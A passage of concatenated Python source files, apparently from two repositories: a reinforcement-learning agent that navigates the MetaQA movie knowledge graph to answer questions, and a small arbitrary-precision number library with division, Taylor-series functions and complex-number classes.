packed = pack_padded_sequence(x, lengths, batch_first=True)
output, final = self.rnn(packed)
output, _ = pad_packed_sequence(output, batch_first=True)
# we need to manually concatenate the final states for both directions
fwd_final = final[0:final.size(0):2]
bwd_final = final[1:final.size(0):2]
final = torch.cat([fwd_final, bwd_final], dim=2) # [num_layers, batch, 2*dim]
return output, final
class Decoder(nn.Module):
    """A conditional GRU decoder with attention.

    At each step the previous action embedding is concatenated with an
    attention-weighted context over the encoder states and fed to the GRU.
    A "pre-output" feature (embedding + rnn output + context, projected to
    hidden_size) is also returned for the downstream value head.
    """

    def __init__(self, emb_size, hidden_size, attention, num_layers=1, dropout=0.0, bridge=True):
        super(Decoder, self).__init__()
        self.hidden_size = hidden_size
        self.num_layers = num_layers
        self.attention = attention
        self.dropout = dropout
        # rnn input = previous embedding + bidirectional context (2*hidden)
        self.rnn = nn.GRU(emb_size+2*hidden_size, hidden_size, num_layers, batch_first=True, dropout=dropout)
        # to initialize from the final encoder state
        self.bridge = nn.Linear(2*hidden_size, hidden_size, bias=True) if bridge else None
        self.dropout_layer = nn.Dropout(p=dropout)
        self.pre_output_layer = nn.Linear(hidden_size + 2*hidden_size + emb_size, hidden_size, bias=False)

    def forward_step(self, prev_embed, encoder_hidden, src_mask, proj_key, hidden):
        """Perform a single decoder step (1 word).

        Returns (output, new_hidden, pre_output, attn_probs).
        """
        # compute context vector using attention mechanism
        query = hidden[-1].unsqueeze(1)  # [#layers, B, D] -> [B, 1, D]
        context, attn_probs = self.attention(query=query, proj_key=proj_key, value=encoder_hidden, mask=src_mask)
        # update rnn hidden state
        rnn_input = torch.cat([prev_embed, context], dim=2)
        output, hidden = self.rnn(rnn_input, hidden)
        # pre-output feature: concat(embedding, rnn output, context), projected
        pre_output = torch.cat([prev_embed, output, context], dim=2)
        pre_output = self.dropout_layer(pre_output)
        pre_output = self.pre_output_layer(pre_output)
        return output, hidden, pre_output, attn_probs

    def forward(self, trg_embed, encoder_hidden, encoder_final, src_mask, trg_mask, hidden=None, max_len=None):
        """Unroll the decoder one step at a time (teacher forcing over trg_embed)."""
        # the maximum number of steps to unroll the RNN
        if max_len is None:
            max_len = trg_mask.size(-1)
        # initialize decoder hidden state from the encoder's final state
        if hidden is None:
            hidden = self.init_hidden(encoder_final)
        # pre-compute projected encoder hidden states
        # (the "keys" for the attention mechanism)
        # this is only done for efficiency
        proj_key = self.attention.key_layer(encoder_hidden)
        # here we store all intermediate hidden states and pre-output vectors
        decoder_states = []
        pre_output_vectors = []
        attn_probs_history = []
        # unroll the decoder RNN for max_len steps
        for i in range(max_len):
            prev_embed = trg_embed[:, i].unsqueeze(1)
            output, hidden, pre_output, attn_probs = self.forward_step(prev_embed, encoder_hidden, src_mask, proj_key, hidden)
            decoder_states.append(output)
            pre_output_vectors.append(pre_output)
            attn_probs_history.append(attn_probs)
        decoder_states = torch.cat(decoder_states, dim=1)
        pre_output_vectors = torch.cat(pre_output_vectors, dim=1)
        return decoder_states, hidden, pre_output_vectors, attn_probs_history  # [B, N, D]

    def init_hidden(self, encoder_final):
        """Returns the initial decoder state,
        conditioned on the final encoder state."""
        if encoder_final is None:
            return None  # start with zeros
        return torch.tanh(self.bridge(encoder_final))
class BahdanauAttention(nn.Module):
"""Implements Bahdanau (MLP) attention"""
def __init__(self, hidden_size, key_size=None, query_size=None):
super(BahdanauAttention, self).__init__()
# We assume a bi-directional encoder so key_size is 2*hidden_size
key_size = 2*hidden_size if key_size is None else key_size
query_size = hidden_size if query_size is None else query_size
self.key_layer = nn.Linear(key_size, hidden_size, bias=False)
self.query_layer = nn.Linear(query_size, hidden_size, bias=False)
self.energy_layer = nn.Linear(hidden_size, 1, bias=False)
# to store attention scores
self.alphas = None
def forward(self, query=None, proj_key=None, value=None, mask=None):
assert mask is not None, "mask is required"
# We first project the query (the decoder state).
# The projected keys (the encoder states) were already pre-computated.
query = self.query_layer(query)
# Calculate scores.
scores = self.energy_layer(torch.tanh(query + proj_key))
scores = scores.squeeze(2).unsqueeze(1)
# Mask out invalid positions.
# The mask marks valid positions so we invert it using `mask & 0`.
scores.data.masked_fill_(mask == 0, -float('inf'))
# Turn scores to probabilities.
alphas = F.softmax(scores, dim=-1)
self.alphas = alphas
# The context vector is the weighted sum of the values.
context = torch.bmm(alphas, value)
# context shape: [B, 1, 2D], alphas shape: [B, 1, M]
return context, alphas
class Evaluator(nn.Module):
    """Linear action-value head mapping decoder features to per-action scores."""

    def __init__(self, hidden_size, vocab_size):
        super(Evaluator, self).__init__()
        self.proj = nn.Linear(hidden_size, vocab_size, bias=False)

    def forward(self, x):
        """Project `x` ([..., hidden_size]) to [..., vocab_size] values."""
        return self.proj(x)
def make_model(src_vocab, tgt_vocab, emb_size=256, hidden_size=512, num_layers=1, dropout=0.0):
    """Assemble the full encoder-decoder model from hyperparameters."""
    attention = BahdanauAttention(hidden_size)
    encoder = Encoder(emb_size, hidden_size, num_layers=num_layers, dropout=dropout)
    decoder = Decoder(emb_size, hidden_size, attention, num_layers=num_layers, dropout=dropout)
    return EncoderDecoder(
        encoder,
        decoder,
        nn.Embedding(src_vocab, emb_size),
        nn.Embedding(tgt_vocab, emb_size),
        Evaluator(hidden_size, tgt_vocab),
    )
class Batch:
    """Padded (src, trg) mini-batch plus the masks derived from padding.

    `src` and `trg` are each a (tensor, lengths) pair as produced by the
    collate step; positions equal to `pad_index` are masked out.
    """

    def __init__(self, src, trg, pad_index=0):
        src_tensor, src_lengths = src
        trg_tensor, trg_lengths = trg
        self.src = src_tensor
        self.src_lengths = src_lengths
        # [B, 1, M] mask of non-pad source positions (broadcasts over queries)
        self.src_mask = (src_tensor != pad_index).unsqueeze(-2)
        self.nseqs = src_tensor.size(0)
        self.trg = trg_tensor
        self.trg_lengths = trg_lengths
        self.trg_mask = (trg_tensor != pad_index)
        # number of real (non-pad) target tokens in the batch
        self.ntokens = self.trg_mask.data.sum().item()
def simulate_episode(G, qa_instance, tokenizer, model, action_to_ix, max_len, epsilon, verbose=False):
    """Roll out one epsilon-greedy graph-navigation episode for a QA instance.

    Starting at the question's topic-entity node of `G`, repeatedly select an
    outgoing edge type (or "terminate") from the model's action values, for at
    most `max_len` steps. Reward is 1.0 only when the agent terminates on a
    node whose label (after the "type: " prefix) is in the answer set.

    Returns (kgnode_chain, action_chain, reward_chain), one entry per step.
    Relies on module-level DEVICE, `unique`, `random`, and `re`.
    """
    question, decorated_entity, answer_set = qa_instance
    # Encode the question once; the attention mask doubles as the source mask.
    tokenized_inputs = tokenizer(question, max_length=50, padding=True, truncation=True, return_tensors="pt")
    src, src_mask = tokenized_inputs["input_ids"].to(DEVICE), tokenized_inputs["attention_mask"].unsqueeze(-2).to(DEVICE)
    assert decorated_entity in G.nodes
    kgnode = decorated_entity
    if verbose:
        print(question)
        print(kgnode)
    kgnode_chain = []
    action_chain = []
    reward_chain = []
    encoder_hidden, encoder_final = model.encode(src, src_mask, [src_mask.sum().item()])
    # pre-compute projected encoder hidden states
    # (the "keys" for the attention mechanism)
    # this is only done for efficiency
    proj_key = model.decoder.attention.key_layer(encoder_hidden)
    # initialize decoder hidden state
    hidden_init = model.decoder.init_hidden(encoder_final)
    # prime the decoder with the start-of-sequence action embedding
    sos_embed = model.trg_embed(torch.tensor([action_to_ix["[SOS]"]], device=DEVICE)).unsqueeze(1)
    _, hidden, context, _ = model.decoder.forward_step(sos_embed, encoder_hidden, src_mask, proj_key, hidden_init)
    for t in range(max_len):
        # compute the action value functions for available actions at the current node
        actions = unique([info["type"] for (_, _, info) in G.edges(kgnode, data=True)]) + ["terminate"]
        values = model.evaluator(context)[0, 0, [action_to_ix[action] for action in actions]]
        # select the action at the current time step with epsilon-greedy policy
        if random.random() < epsilon:
            action = random.choice(actions)
        else:
            action = actions[values.argmax()]
        # take the action; the final step is forced to behave like termination
        if (action == "terminate") or (t == max_len-1):
            # success iff we chose to terminate AND the node label is a gold answer
            reward = torch.tensor(1.0 if ((action == "terminate") and (re.match(r".+: (.+)", kgnode).group(1) in answer_set)) else 0.0).to(DEVICE)
            kgnode_next = "termination"
            hidden_next = None
            context_next = None
        else:
            reward = torch.tensor(0.0).to(DEVICE)
            # follow a uniformly random edge of the chosen type
            kgnode_next = random.choice(list(filter(lambda tp: tp[2]["type"] == action, G.edges(kgnode, data=True))))[1]
            action_embed = model.trg_embed(torch.tensor([action_to_ix[action]], device=DEVICE)).unsqueeze(1)
            _, hidden_next, context_next, _ = model.decoder.forward_step(action_embed, encoder_hidden, src_mask, proj_key, hidden)
        kgnode_chain.append(kgnode)
        action_chain.append(action)
        reward_chain.append(reward)
        if verbose:
            print(actions)
            print(values.data.reshape(-1).to("cpu"))
            print(action, " =====> ", kgnode_next)
        if kgnode_next == "termination":
            break
        else:
            kgnode = kgnode_next
            hidden = hidden_next
            context = context_next
    return kgnode_chain, action_chain, reward_chain
def make_batch(episodes, tokenizer, action_to_ix, pad_index=0, sos_index=1):
    """Collate simulated episodes into a training Batch plus per-episode chains.

    Episodes are sorted by descending question length (required by the
    encoder's pack_padded_sequence) and then by descending action count.
    Relies on the module-level DEVICE and the Batch class.
    """
    episodes = sorted(
        episodes,
        key=lambda e: (-len(tokenizer.tokenize(e.qa_instance.question)), -len(e.action_chain)),
    )
    questions = [e.qa_instance.question for e in episodes]
    inputs = tokenizer(questions, max_length=50, padding=True, truncation=True,
                       return_tensors="pt", return_length=True)
    src = inputs["input_ids"].to(DEVICE)
    src_lengths = inputs["length"]
    max_len = max(len(e.action_chain) for e in episodes)
    # target rows: [SOS] + action ids, right-padded to a common length
    rows = []
    for e in episodes:
        ids = [sos_index] + [action_to_ix[a] for a in e.action_chain]
        ids += [pad_index] * (max_len - len(e.action_chain))
        rows.append(torch.tensor([ids], device=DEVICE))
    trg = torch.cat(rows, dim=0)
    trg_lengths = [len(e.action_chain) + 1 for e in episodes]
    kgnode_chains = [e.kgnode_chain for e in episodes]
    action_chains = [e.action_chain for e in episodes]
    reward_chains = [e.reward_chain for e in episodes]
    return Batch((src, src_lengths), (trg, trg_lengths), pad_index=pad_index), kgnode_chains, action_chains, reward_chains
def compute_loss(episodes, tokenizer, model, action_to_ix, verbose=False):
    """One-step TD (Q-learning style) regression loss over replayed episodes.

    The target for each step is reward + gamma * max_a' Q(s', a'), with the
    bootstrap term detached via .item(); the terminal step's target is the
    reward alone.

    NOTE(review): relies on module-level globals G, gamma, and loss_func,
    which are only defined inside the __main__ block -- confirm before
    importing this function from elsewhere.
    """
    batch, kgnode_chains, action_chains, reward_chains = make_batch(episodes, tokenizer, action_to_ix)
    _, _, pre_output, _ = model.forward(batch.src, batch.trg, batch.src_mask, batch.trg_mask, batch.src_lengths, batch.trg_lengths)
    # action values for every episode and unrolled step: [B, T+1, n_actions]
    batch_values = model.evaluator(pre_output)
    losses = []
    for (i, (kgnode_chain, action_chain, reward_chain)) in enumerate(zip(kgnode_chains, action_chains, reward_chains)):
        for t in range(len(kgnode_chain)):
            kgnode, action, reward = kgnode_chain[t], action_chain[t], reward_chain[t]
            if t != len(kgnode_chain)-1:
                # bootstrap target from the best action available at the next node
                kgnode_next = kgnode_chain[t+1]
                actions_next = unique([info["type"] for (_, _, info) in G.edges(kgnode_next, data=True)]) + ["terminate"]
                values_next = batch_values[i, t+1, [action_to_ix[action] for action in actions_next]]
                reference = reward + gamma*values_next.max().item()
            else:
                # terminal step: no bootstrapping
                reference = reward
            losses.append(loss_func(batch_values[i, t, action_to_ix[action]], reference))
            if verbose:
                print("    {:100s} {:30s} {:7.4f} {:7.4f}".format(kgnode, action, batch_values[i, t, action_to_ix[action]].data.to("cpu").item(), reference.to("cpu").item()))
    return sum(losses) / len(losses)
def evaluate_accuracy(G, qa_instances, tokenizer, model, action_to_ix, max_len, verbose=False):
    """Fraction of instances whose greedy (epsilon = 0) rollout ends in success."""
    num_success = 0
    for qa_instance in qa_instances:
        with torch.no_grad():
            _, _, reward_chain = simulate_episode(G, qa_instance, tokenizer, model,
                                                  action_to_ix, max_len, 0.0, verbose)
        succeeded = reward_chain[-1] == 1.0
        if verbose:
            print("\noutcome: {:s}\n".format("success" if succeeded else "failure"))
        if succeeded:
            num_success += 1
    return num_success / len(qa_instances)
if __name__ == "__main__":
    # ---- hyperparameters ----
    emb_size = 256
    hidden_size = 512
    num_layers = 1
    max_len = 4            # maximum navigation steps per episode
    gamma = 0.90           # TD discount factor
    kappa = 0.20           # probability of replaying a previously failed instance
    epsilon_start = 1.00   # exploration schedule (exponential decay)
    epsilon_end = 0.10
    decay_rate = 5.00
    M = 3000000            # total simulated episodes
    batch_size = 32
    # experiment tag used for checkpoint and log paths
    experiment = "e{:03d}_h{:03d}_l{:02d}_g{:03d}_k{:03d}_m{:07d}".format(emb_size, hidden_size, num_layers, int(gamma*100), int(kappa*100), M)
    os.makedirs("checkpoints/{:s}".format(experiment), exist_ok=True)
    # redirect all output (including tracebacks) to the experiment log file
    # NOTE(review): this handle is never closed/flushed explicitly
    sys.stderr = sys.stdout = open("logs/{:s}".format(experiment), "w")
    entity_token = "[ETY]"
    tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased", additional_special_tokens=[entity_token])
    # knowledge graph and QA splits for 1/2/3-hop questions
    G = read_MetaQA_KG()
    qa_train_1h, qa_dev_1h, qa_test_1h = read_MetaQA_Instances("1-hop", entity_token, DEVICE)
    qa_train_2h, qa_dev_2h, qa_test_2h = read_MetaQA_Instances("2-hop", entity_token, DEVICE)
    qa_train_3h, qa_dev_3h, qa_test_3h = read_MetaQA_Instances("3-hop", entity_token, DEVICE)
    qa_train = pd.concat([qa_train_1h, qa_train_2h, qa_train_3h])
    qa_dev = pd.concat([ qa_dev_1h, qa_dev_2h, qa_dev_3h])
    qa_test = pd.concat([ qa_test_1h, qa_test_2h, qa_test_3h])
    # action vocabulary: padding + SOS + every edge type + terminate
    possible_actions = ["[PAD]", "[SOS]"] + sorted(list(set([edge[2]["type"] for edge in G.edges(data=True)]))) + ["terminate"]
    action_to_ix = dict(map(reversed, enumerate(possible_actions)))
    model = make_model(len(tokenizer), len(possible_actions), emb_size=emb_size, hidden_size=hidden_size, num_layers=num_layers, dropout=0.2).to(DEVICE)
    loss_func = nn.MSELoss()
    optimizer = optim.AdamW(model.parameters(), lr=3.0e-4, betas=(0.9, 0.999), weight_decay=2.5e-4)
    # replay buffers: all episodes, plus success-only and failure-only views
    memory_overall = ReplayMemory(1000)
    memory_success = ReplayMemory(1000)
    memory_failure = ReplayMemory(1000)
    for m in range(M):
        # exponentially decay exploration from epsilon_start toward epsilon_end
        epsilon = epsilon_end + (epsilon_start - epsilon_end) * math.exp(-decay_rate * (m / M))
        print("epsilon: {:5.3f}".format(epsilon))
        # with probability kappa, retry a previously failed instance
        if (len(memory_failure) > 0) and (random.random() < kappa):
            qa_instance = memory_failure.sample_random(1)[0].qa_instance
        else:
            qa_instance = qa_train.sample(1).values[0]
        with torch.no_grad():
            kgnode_chain, action_chain, reward_chain = simulate_episode(G, qa_instance, tokenizer, model, action_to_ix, max_len, epsilon, verbose=True)
        print("\noutcome: {:s}\n".format("success" if (reward_chain[-1] == 1.0) else "failure"))
        if reward_chain[-1] == 1.0:
            memory_overall.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
            memory_success.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
        else:
            memory_overall.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
            memory_failure.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
        # optimize model
        episodes = memory_overall.sample_random(batch_size)
        loss = compute_loss(episodes, tokenizer, model, action_to_ix, verbose=True)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        print("\n")
        # periodic evaluation + checkpoint
        if (m+1) % 100000 == 0:
            model.train(False)
            print("  training accuracies for 1-hop, 2-hop, 3-hop questions are {:7.4f}, {:7.4f}, {:7.4f}".format(evaluate_accuracy(G, qa_train_1h, tokenizer, model, action_to_ix, max_len),
                                                                                                                 evaluate_accuracy(G, qa_train_2h, tokenizer, model, action_to_ix, max_len),
                                                                                                                 evaluate_accuracy(G, qa_train_3h, tokenizer, model, action_to_ix, max_len)))
            print("validation accuracies for 1-hop, 2-hop, 3-hop questions are {:7.4f}, {:7.4f}, {:7.4f}".format(evaluate_accuracy(G, qa_dev_1h, tokenizer, model, action_to_ix, max_len),
                                                                                                                 evaluate_accuracy(G, qa_dev_2h, tokenizer, model, action_to_ix, max_len),
                                                                                                                 evaluate_accuracy(G, qa_dev_3h, tokenizer, model, action_to_ix, max_len)))
            model.train(True)
            print("\n\n")
            torch.save({"model": model.state_dict()}, "checkpoints/{:s}/save@{:07d}.pt".format(experiment, m+1))
    # final test-set evaluation (verbose rollouts)
    model.train(False)
    print("   testing accuracies for 1-hop, 2-hop, 3-hop questions are {:7.4f}, {:7.4f}, {:7.4f}".format(evaluate_accuracy(G, qa_test_1h, tokenizer, model, action_to_ix, max_len, True),
                                                                                                         evaluate_accuracy(G, qa_test_2h, tokenizer, model, action_to_ix, max_len, True),
                                                                                                         evaluate_accuracy(G, qa_test_3h, tokenizer, model, action_to_ix, max_len, True)))
    model.train(True)
--- FILE SEPARATOR ---
import os
import torch
from transformers import GPT2Tokenizer, GPT2Model
# Scratch/playground script: try GPT-2 and BERT tokenization of a templated
# question containing a custom special token.
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
# API reminders: tokenizer.tokenize / tokenizer.encode / model.forward
tokenizer = GPT2Tokenizer.from_pretrained('gpt2', pad_token="[PAD]", additional_special_tokens=["[OBJ]"])
model = GPT2Model.from_pretrained('gpt2')
embedding_layer = model.resize_token_embeddings(len(tokenizer)) # Update the model embeddings with the new vocabulary size
inputs = tokenizer("who is the writer for [OBJ]", max_length=50, padding="max_length", truncation=True, return_tensors='pt')
outputs = model(input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"])
# Same question through a BERT tokenizer, padded to a shorter fixed length.
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased", additional_special_tokens=["[OBJ]"])
inputs = tokenizer("who is the writer for [OBJ]", max_length=10, padding="max_length", truncation=True, return_tensors='pt')
--- FILE SEPARATOR ---
import networkx as nx
import pandas as pd
import random
import re
import torch
from collections import namedtuple
from transformers import AutoTokenizer
# One QA example: the templated question text, the decorated topic-entity node
# name (e.g. "movie: <title>"), and the set of gold answer strings.
QAInstance = namedtuple("QAInstance", ["question", "decorated_entity", "answer_set"])
# One simulated rollout: its instance plus the visited-node/action/reward chains.
Episode = namedtuple("Episode", ["qa_instance", "kgnode_chain", "action_chain", "reward_chain"])
class ReplayMemory:
    """Fixed-capacity ring buffer of episodes."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.memory = []
        self.position = 0  # index of the next slot to overwrite

    def push(self, episode):
        """Store an episode, evicting the oldest once capacity is reached."""
        if len(self.memory) < self.capacity:
            self.memory.append(None)  # grow the ring until it is full
        self.memory[self.position] = episode
        self.position = (self.position + 1) % self.capacity

    def sample_random(self, batch_size):
        """Sample `batch_size` stored episodes uniformly, with replacement."""
        return random.choices(self.memory, k=batch_size)

    def sample_last(self, batch_size):
        """Return the `batch_size` most recent episodes, newest first."""
        cursor = self.position
        recent = []
        for _ in range(batch_size):
            cursor = (cursor - 1 + len(self.memory)) % len(self.memory)
            recent.append(self.memory[cursor])
        return recent

    def __len__(self):
        return len(self.memory)
def unique(items):
    """Return the distinct elements of `items` as a sorted list.

    (Simplified: `sorted` accepts any iterable, so the intermediate
    `list(...)` around the set was redundant.)
    """
    return sorted(set(items))
def read_MetaQA_KG():
    """Load the MetaQA knowledge base as a NetworkX multidigraph.

    Node names are "type: value" strings (e.g. "movie: <title>") with a
    matching "type" attribute; every KB triple contributes a forward edge
    (fwd_<relation>) and a reverse edge (rvs_<relation>).
    """
    prefixes = {
        "directed_by": "director: ",
        "written_by": "writer: ",
        "starred_actors": "actor: ",
        "release_year": "year: ",
        "in_language": "language: ",
        "has_tags": "tag: ",
        "has_genre": "genre: ",
        "has_imdb_votes": "votes: ",
        "has_imdb_rating": "rating: ",
    }

    def edge_to_prefix(edge):
        try:
            return prefixes[edge]
        except KeyError:
            raise Exception("unexpected edge type \"" + edge + "\"")

    df = pd.read_csv("datasets/MetaQA/kb.txt", delimiter='|', names=["head", "edge", "tail"])
    decorated_heads = "movie: " + df["head"]
    decorated_tails = df["edge"].apply(edge_to_prefix) + df["tail"]
    fwd_edges = "fwd_" + df["edge"]
    rvs_edges = "rvs_" + df["edge"]
    G = nx.MultiDiGraph()
    for column in (decorated_heads, decorated_tails):
        G.add_nodes_from((node, {"type": node.split(':')[0]}) for node in column.unique())
    G.add_edges_from((h, t, {"type": e}) for h, t, e in zip(decorated_heads, decorated_tails, fwd_edges))
    G.add_edges_from((t, h, {"type": e}) for h, t, e in zip(decorated_heads, decorated_tails, rvs_edges))
    return G
def read_MetaQA_Instances(question_type="1-hop", entity_token="[ETY]", device="cpu"):
    """Load the train/dev/test QAInstance series for one MetaQA question type.

    Parameters:
        question_type: dataset folder, e.g. "1-hop"/"2-hop"/"3-hop".
        entity_token: special token substituted for the bracketed topic entity.
        device: unused here (kept for interface compatibility).

    Returns (train, dev, test) pandas Series of QAInstance.
    (Refactored: the three splits were loaded by triplicated copy-pasted code;
    they now share a single _load_split helper.)
    """
    def process_question(question):
        # Replace the bracketed topic entity with the special token and
        # remember the entity string itself.
        processed_question = re.sub(r"(\[.+\])", entity_token, question)
        entity = re.search(r"\[(.+)\]", question).group(1)
        return processed_question, entity

    def process_answers(answers):
        # Gold answers are pipe-separated in the raw files.
        return set(answers.split('|'))

    def info_to_instance(info):
        processed_question, entity = process_question(info["question"])
        # e.g. question_type "movie_to_director" -> start node "movie: <entity>"
        decorated_entity = info["question_type"].split('_')[0] + ": " + entity
        answer_set = process_answers(info["answers"])
        return QAInstance(processed_question, decorated_entity, answer_set)

    def _load_split(split):
        # Each split pairs a tab-separated question/answers file with a
        # parallel file holding one question-type label per line.
        text = pd.read_csv("datasets/MetaQA/" + question_type + "/vanilla/qa_" + split + ".txt",
                           delimiter='\t', names=["question", "answers"])
        qtype = pd.read_csv("datasets/MetaQA/" + question_type + "/qa_" + split + "_qtype.txt",
                            names=["question_type"])
        return pd.concat([text, qtype], axis=1).apply(info_to_instance, axis=1)

    return _load_split("train"), _load_split("dev"), _load_split("test")
|
[
"/main.py",
"/playground.py",
"/utils.py"
] |
000alen/Engine
|
from Engine.Number import DEFAULT_PRECISION, Number, NUMBER_ZERO, NUMBER_ONE
from numba import njit
@njit
def number_division(x: Number, y: Number, n: int = DEFAULT_PRECISION) -> Number:
    """Divide x by y via decimal long division.

    Produces at most `n` quotient digits once the remainder sequence starts
    repeating (periodic expansion). Raises ZeroDivisionError when y == 0.

    NOTE(review): `N` (decimal digit count) is used below but is not imported
    in this module -- confirm it is re-exported by Engine.Number or add the
    proper import.
    """
    if y == NUMBER_ZERO:
        raise ZeroDivisionError
    if x == NUMBER_ZERO:
        return NUMBER_ZERO
    if x == y:
        return NUMBER_ONE
    x = x.reduce()
    y = y.reduce()
    dividend = abs(x.mantissa)
    divisor = abs(y.mantissa)
    dividend_exponent = x.exponent
    divisor_exponent = y.exponent
    dividend_sign = 1 if x.mantissa >= 0 else -1
    divisor_sign = 1 if y.mantissa >= 0 else -1
    sign = dividend_sign * divisor_sign
    delta_exponent = 0    # powers of ten borrowed to keep dividing
    digits = []           # quotient digits, most significant first
    dividend_history = [] # remainders seen so far (cycle detection)
    step = 0
    while dividend > 0:
        step += 1
        # Scale the dividend up until it has at least as many digits as the
        # divisor, tracking the shift in delta_exponent.
        if N(dividend) < N(divisor):
            dN = N(divisor) - N(dividend)
            dividend *= pow(10, dN)
            delta_exponent += dN
        if dividend < divisor:
            dividend *= 10
            delta_exponent += 1
        digits.append(dividend // divisor)
        dividend -= digits[-1] * divisor
        # Stop once a remainder repeats AND we already have n digits.
        if dividend not in dividend_history:
            dividend_history.append(dividend)
        elif step >= n:
            break
    # Assemble the integer quotient from its digits.
    # (Fixed: the original read `for i, digit i enumerate(...)` -- a syntax
    # error -- and shadowed the loop counter `i`.)
    quotient = sum(
        digit * pow(10, position)
        for position, digit in enumerate(reversed(digits))
    )
    return Number(
        sign * quotient,
        dividend_exponent - divisor_exponent - delta_exponent
    )
@njit
def number_floor_division(x: Number, y: Number) -> Number:
    """Floor-divide x by y: truncating quotient of the mantissas after
    aligning both operands to a common exponent."""
    if y == NUMBER_ZERO:
        raise ZeroDivisionError
    if x == NUMBER_ZERO or abs(x) < abs(y):
        return NUMBER_ZERO
    if x == y:
        return NUMBER_ONE
    x = x.reduce()
    y = y.reduce()
    # Work with magnitudes; re-apply the combined sign at the end.
    num_mantissa = abs(x.mantissa)
    den_mantissa = abs(y.mantissa)
    num_exponent = x.exponent
    den_exponent = y.exponent
    sign = (1 if x.mantissa >= 0 else -1) * (1 if y.mantissa >= 0 else -1)
    # Rescale both mantissas to the smaller exponent so they are comparable.
    base_exponent = min(num_exponent, den_exponent)
    num_mantissa *= pow(10, num_exponent - base_exponent)
    den_mantissa *= pow(10, den_exponent - base_exponent)
    return Number(
        sign * (num_mantissa // den_mantissa),
        base_exponent
    )
--- FILE SEPARATOR ---
from Engine.Number import DEFAULT_PRECISION_TAYLOR_POLYNOMIAL
from functools import cache
from math import floor, log
from numba import njit
@cache
def N(x: int) -> int:
    """Return the number of decimal digits of |x| (N(0) == 1).

    (Fixed: the original used floor(log(|x|, 10)) + 1, which is wrong at
    exact powers of ten because of floating-point error -- e.g.
    log(1000, 10) can evaluate to 2.9999999999999996, giving 3 instead
    of 4. String length is exact for arbitrary-precision ints.)
    """
    return len(str(abs(x)))
@njit
def factorial(x: "Numeric") -> "Numeric":
    """Iterative factorial over the project's Numeric type (1 for x < 1)."""
    from Engine.Number.Number import NUMERIC_ONE
    result = NUMERIC_ONE
    counter = NUMERIC_ONE
    while counter <= x:
        result *= counter
        counter += NUMERIC_ONE
    return result
@njit
def sin(x: "Numeric", n: int = DEFAULT_PRECISION_TAYLOR_POLYNOMIAL) -> "Numeric":
    """Taylor-polynomial sine: the first n terms of
    sum_i (-1)^i x^(2i+1) / (2i+1)!.

    `n` counts series terms, not decimal digits of precision.
    NOTE(review): @njit over project classes likely falls back to object
    mode -- confirm numba compatibility is intended.
    """
    from Engine.Number.Number import Numeric, NUMERIC_ZERO
    y = NUMERIC_ZERO
    for i in range(n):
        # i-th term: (-1)^i / (2i+1)! * x^(2i+1)
        y += (Numeric(-1, 0) ** i) / \
            factorial(Numeric((2 * i) + 1, 0)) * (x ** ((2 * i) + 1))
    return y
@njit
def cos(x: "Numeric", n: int = DEFAULT_PRECISION_TAYLOR_POLYNOMIAL) -> "Numeric":
    """Taylor-polynomial cosine: the first n terms of
    sum_i (-1)^i x^(2i) / (2i)!.

    `n` counts series terms, not decimal digits of precision.
    """
    from Engine.Number.Number import Numeric, NUMERIC_ZERO
    y = NUMERIC_ZERO
    for i in range(n):
        # i-th term: (-1)^i / (2i)! * x^(2i)
        y += (Numeric(-1, 0) ** i) / \
            factorial(Numeric(2 * i, 0)) * (x ** (2 * i))
    return y
@njit
def exp(x: "Numeric", n: int = DEFAULT_PRECISION_TAYLOR_POLYNOMIAL) -> "Numeric":
    """Taylor-polynomial exponential: the first n terms of sum_i x^i / i!.

    (Implemented in the same style as sin/cos above; this previously
    raised NotImplementedError.)
    """
    from Engine.Number.Number import Numeric, NUMERIC_ZERO
    y = NUMERIC_ZERO
    for i in range(n):
        # i-th term: x^i / i!
        y += (x ** i) / factorial(Numeric(i, 0))
    return y
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
from Engine.Number.Real import Real, REAL_ZERO, REAL_ONE
from Engine.Number.Imaginary import Imaginary, IMAGINARY_ZERO, IMAGINARY_ONE
class Complex(Skeleton):
    """Complex number as a (real, imaginary) pair of project types."""

    __real: Real
    __imaginary: Imaginary

    def __init__(self, real: Real, imaginary: Imaginary):
        self.__real = real
        self.__imaginary = imaginary

    def __hash__(self):
        return hash(("Complex", self.real, self.imaginary))

    def __str__(self):
        # (Fixed: the original body was `pass`, so __str__ returned None and
        # any str(complex_value) call raised TypeError.)
        return f"{self.real} + {self.imaginary}i"

    # --- alternate constructors: widen any narrower numeric type ---

    @classmethod
    def from_string(cls, string):
        return cls(Real.from_string(string), IMAGINARY_ZERO)

    @classmethod
    def from_python_integer(cls, python_integer):
        return cls(Real.from_python_integer(python_integer), IMAGINARY_ZERO)

    @classmethod
    def from_number(cls, number):
        return cls(Real.from_number(number), IMAGINARY_ZERO)

    @classmethod
    def from_natural(cls, natural):
        return cls(Real.from_natural(natural), IMAGINARY_ZERO)

    @classmethod
    def from_integer(cls, integer):
        return cls(Real.from_integer(integer), IMAGINARY_ZERO)

    @classmethod
    def from_rational(cls, rational):
        return cls(Real.from_rational(rational), IMAGINARY_ZERO)

    @classmethod
    def from_irrational(cls, irrational):
        return cls(Real.from_irrational(irrational), IMAGINARY_ZERO)

    @classmethod
    def from_real(cls, real):
        return cls(real, IMAGINARY_ZERO)

    @classmethod
    def from_imaginary(cls, imaginary):
        return cls(REAL_ZERO, imaginary)

    @property
    def real(self):
        return self.__real

    @property
    def imaginary(self):
        return self.__imaginary


COMPLEX_ZERO = Complex(REAL_ZERO, IMAGINARY_ZERO)
COMPLEX_ONE = Complex(REAL_ONE, IMAGINARY_ZERO)
COMPLEX_I = Complex(REAL_ZERO, IMAGINARY_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
from Engine.Number.Real import Real, REAL_ZERO, REAL_ONE
class Imaginary(Skeleton):
    """Pure imaginary number: `value` is the real-valued coefficient of i."""

    __value: Real

    def __init__(self, value: Real):
        self.__value = value

    def __hash__(self):
